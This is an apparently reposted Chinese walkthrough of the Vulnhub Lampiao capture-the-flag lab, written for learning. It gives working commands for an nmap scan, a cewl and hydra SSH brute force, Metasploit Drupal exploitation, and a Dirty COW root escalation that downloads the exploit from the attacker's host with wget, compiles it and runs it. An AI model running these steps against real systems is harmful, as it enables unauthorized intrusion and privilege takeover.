【甄选靶场】Vulnhub百个项目渗透——项目二:Lampiao(SSH爆破,脏牛提权)

这篇具有很好参考价值的文章主要介绍了【甄选靶场】Vulnhub百个项目渗透——项目二:Lampiao(SSH爆破,脏牛提权)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

Vulnhub百个项目渗透

Vulnhub百个项目渗透——项目二:Lampiao(SSH爆破,脏牛提权)
靶场地址 提取码:rong


🔥系列专栏:Vulnhub百个项目渗透
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年8月30日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

`


前言

本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。


一、梳理流程

  1. 端口发现(看看使用了哪些端口,开启了什么服务,寻找突破点)
  2. 信息收集(利用遍历,关键词搜索等方式对敏感文件,插件尝试访问,寻求突破并获取shell)
  3. 二次收集(基于已得到的服务或者主机再次信息收集)
  4. 内网提权(尝试利用内核,各种版本漏洞等方式来提升权限)
  5. 毁尸灭迹(清除日志等文件,但是靶场就没必要了,拿旗就走)

二、使用步骤

1.端口发现

代码如下:

ifconfig                  //用来查看自己的IP
namp 192.168.247.0/24 -sP //用来扫描同网段所有存活主机,注意最后是0
这个IP是你ifconfig出来的IP
nmap -p- 192.168.247.134  //扫描开放端口,找服务

【甄选靶场】Vulnhub百个项目渗透——项目二:Lampiao(SSH爆破,脏牛提权)

开放了一个web,还有一个ssh,还有一个未知的
思考ssh爆破的可能性,这就需要我们去web页面信息收集

2.web突破

【甄选靶场】Vulnhub百个项目渗透——项目二:Lampiao(SSH爆破,脏牛提权)

打开是这样,源码也是这样,没有任何信息,这个时候有两种选择,要么会有其他的端口有其他的服务,要么在旁站有其他的服务,我们先看看之前那个未知的端口

【甄选靶场】Vulnhub百个项目渗透——项目二:Lampiao(SSH爆破,脏牛提权)

这是1898端口的服务,没有账户密码就不考虑爆破登陆了,几乎没有可能性,有一个read more 我们点开

【甄选靶场】Vulnhub百个项目渗透——项目二:Lampiao(SSH爆破,脏牛提权)

红框看到了明显的序列排列,那么这里有可能有sql注入,或者是隐藏信息,我们先改一下数字看看有啥。

【甄选靶场】Vulnhub百个项目渗透——项目二:Lampiao(SSH爆破,脏牛提权)

改成2有两个文件

【甄选靶场】Vulnhub百个项目渗透——项目二:Lampiao(SSH爆破,脏牛提权)

改成3也有,依次访问
audio.m4a:语音获得用户名:tiago
qrc.png:图片二维码扫描获得信息,需要爆破

至此这个端口信息收集的基本上完毕,开始爆一下网站的旁站,可以利用dirb,也可以用御剑或者啥的,看你自己

【甄选靶场】Vulnhub百个项目渗透——项目二:Lampiao(SSH爆破,脏牛提权)

我用的铸剑,这个我就扫了一下,字典80万,太慢了,有这个就够了
又想要的私聊我

【甄选靶场】Vulnhub百个项目渗透——项目二:Lampiao(SSH爆破,脏牛提权)

访问了robots.txt,看到了一些.txt文件,去看看

【甄选靶场】Vulnhub百个项目渗透——项目二:Lampiao(SSH爆破,脏牛提权)

是一个介绍cms版本的,Drupal 7.54, 2017-02-01(这里肯定有版本漏洞,不过并不能让我们获取shell)
但这里,web能利用的基本上利用完了,没什么信息可以收集的了,也就可能之前有个sql注入,我用sqlmap跑了一遍,也并没有很能利用的点,视线再次回到端口,想到了ssh,一想到这,就想到之前有一个语音跟我们说了用户名,那就是爆破;那么密码从哪里来?在ctf靶场中,我们要知道可以使用cewl来遍历页面收集出一份密码,那么这里我们试试。

cewl http://182.168.247.128:1898/?q=node/1 -w rong.txt
--先把页面收集到的密码写入rong.txt
hydra -l tiago -P rong.txt 192.168.247.128 ssh
--利用九头蛇爆破  语法可以百度,日常使用语法很简单
得到密码如下
用户: tiago
密码: Virgulino

1.SSH突破

ssh tiago@192.168.247.128    --登录ssh,密码输入不显示,输就行了
id   ----查看当前用户,发现是低权限用户,需要提权

2.msf突破

msfconsole
search  Drupal
use unix/webapp/drupal_restws_exec
set rport 1898
set rhosts 192.168.247.128

meterpreter > shell
python -c 'import pty; pty.spawn("/bin/bash")'

成功通过漏洞渗透进入系统,获得低权限用户,和前面ssh登陆的tiago用户权限类似,
这是另外一种渗透的方法,比较方便。

3.漏扫突破

带着xray进去点点点(xray是一款被动扫描器),也可以联动awvs来一起工作
可以很快的知道有没有漏洞

【甄选靶场】Vulnhub百个项目渗透——项目二:Lampiao(SSH爆破,脏牛提权)像这就扫到一个cve-2022-23779的漏洞
【甄选靶场】Vulnhub百个项目渗透——项目二:Lampiao(SSH爆破,脏牛提权)

还有一个Drupal CVE-2018-7600的RCE
给出了两个链接
https://github.com/dreadlocked/Drupalgeddon2 --里面都有详细用法
https://paper.seebug.org/567/
bp抓包把xray的请求头写进去就好,调试到200,按照给出的poc去使用即可
这个rb在用的时候会报错,我们需要排错

sudo gem install highline

三.内网突破

1.寻找exp

利用之前的已知cms,寻找EXP
网上搜到这个版本的cms可以使用脏牛通杀

2.利用漏洞

【甄选靶场】Vulnhub百个项目渗透——项目二:Lampiao(SSH爆破,脏牛提权)

msf搜索到exp还要去官网看一下怎么使用,直接谷歌搜索40847就行
红框里面就是我们的利用方法:按照这个去写命令即可

searchsploit dirty
使用:Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privile | linux/local/40847.cpp

python -m http.server 8081
cp /usr/share/exploitdb/exploits/linux/local/40847.cpp /root/
-----把exp复制到桌面
继续开启本地pthon服务,然后把40847.cp发送到靶机上:
wget http://192.168.247.129:8081/40847.cpp
------

命令:g++ -Wall -pedantic -O2 -std=c++11 -pthread -o rong 40847.cpp -lutil
-Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
-pedantic 允许发出ANSI/ISO C标准所列出的所有警告
-O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
-std=c++11就是用按C++2011标准来编译的
-pthread 在Linux中要用到多线程时,需要链接pthread库
-o dcow gcc生成的目标文件,名字为dcow
执行gcc编译可执行文件../rong     --执行文件
Root password is:   dirtyCowFun
获得root用户密码!

9、登录root-ssh
ssh root@192.168.247.128
ls
root@lampiao:~# cat /root/flag.txt 
9740616875908d91ddcdaa8aea3af366

四.总结

1.cewl的页面爬虫获取密码本
2.利用msf快速拿shell
3.漏扫出漏洞
4.脏牛提权多快好省文章来源地址https://www.toymoban.com/news/detail-462527.html

到了这里,关于【甄选靶场】Vulnhub百个项目渗透——项目二:Lampiao(SSH爆破,脏牛提权)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 实训渗透靶场02|3星vh-lll靶机|vulnhub靶场Node1

    写在前面: 此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出。欢迎各位前来交流。(部分材料来源网络,若有侵权,立即删除) netdiscover扫描目的IP 发现开放端口为22和3000 访问3000 3000端口是node 对node.js稍有了解的都知道 3000是node.js的默认端口,简

    2024年02月13日
    浏览(35)
  • ssh渗透与hydra爆破(简明不啰嗦)

    适合新手上路,MSF与hydra两种方式渗透22端口,后进行远程连接,如有不足请各位见谅 此次实验仅供参考,切勿做违法犯罪,出事一切与本人无关后果自负,希望大家早日成为白帽子。 渗透机:kali 靶机:192.168.75.128 1.扫描局域网寻找22端口(开放) nmap 192.168.75.1/24 2.已知192.1

    2024年02月04日
    浏览(45)
  • Vulnhub靶机渗透之新手入门 JIS-CTF入门靶场-学习笔记

    目录 学习前言 准备工作 一、寻找目标主机(信息收集) 二、敏感文件 三、Getshell上传木马 用蚁剑进行Getshell 四、寻找Linux密码进行ssh连接 五、连接SSH最后一步 六、总结 vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去

    2024年02月14日
    浏览(40)
  • Vulnhub-Lampiao

    nmap扫描 1. hydra爆破密码 在主页点击read me跳转页面 把url地址后面的1更改为2 发现一个音频文件和一个二维码图片 通过音频文件得到账号为tiago,扫描二维码图片提示爆破。利用cewl工具爬取生成一个字典进行爆破 2. Drupal漏洞利用 通过drub爆破得到robots.txt文件 在robots文件中发现

    2024年01月21日
    浏览(43)
  • Lampiao靶场-dirtycow漏洞利用

    目录 Lampiao靶场-dirtycow漏洞利用 一、主机发现 二、端口扫描 三、目录遍历 四、拿到webshell 五、实现交互式shell 六、暴力破解 七、把dirtycow脚本传到靶机 八、编译运行dirtycow脚本 只是简单记录一下所用工具 机器信息: 靶机:192.168.142.132 攻击机:192.168.142.133 nmap -sP 192.168.14

    2023年04月11日
    浏览(41)
  • Kali Vulnhub-lampiao脏牛提权(dirtyCow)漏洞复现

    Kali版本:2022.3 目标主机ip:192.168.186.148 攻击机ip:192.168.186.147 vulnhub和vulhub不同,无需安装环境。 lampiao下载地址:https://www.vulnhub.com/entry/lampiao-1,249 下载完成正常解压后,vmware打开ovf格式文件,创建lampiao虚拟机文件即可,设置网络为NAT模式 登陆界面如下,此时账户密码未知

    2024年01月21日
    浏览(42)
  • lampiao靶机渗透测试

    一、前言         已经好久没有复习过主机渗透的相关知识了,上一次进行渗透的学习已经是4个月前了,本篇对lampiao靶机进行一下渗透测试。  二、信息采集  第一步先查看自身kali主机网段,ip为192.168.119.128,24位子网掩码。   接着使用下面的命令nmap扫描出靶机的ip为

    2024年02月13日
    浏览(44)
  • 内网渗透思路学习——靶场实战——暗月项目七

    #免责声明: 本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。 靶场地址: https://pan.baidu.com/s/12pSYxSU-ZmurQ9–GFiaXQ 提取码: 3p47 项目七靶场渗透最终目的:获得域控中的flag.txt文件中的内容 项目七靶场环境是用 VMware Workstation 搭建,把环境

    2023年04月10日
    浏览(43)
  • vulnhub靶场实战系列(一)之vulnhub靶场介绍

    Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚机到获取操作系统的root权限和查看flag。 我们在学

    2024年02月10日
    浏览(40)
  • vulnhub DC-5靶场

    目录 1.信息收集 2.网站分析 3.漏洞利用 4.提升权限 扫描主机 sudo arp-scan -l 扫描端口 nmap -p- 192.168.42.149 扫描指纹 whatweb 192.168.42.149 查看端口详细服务 nmap -A -p- -v 192.168.42.149 扫描目录 dirbuster 浏览网站,发现都是静态页面 只有contact.php有上传窗口 尝试上传,发现问题copyright旁的

    2024年02月05日
    浏览(39)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包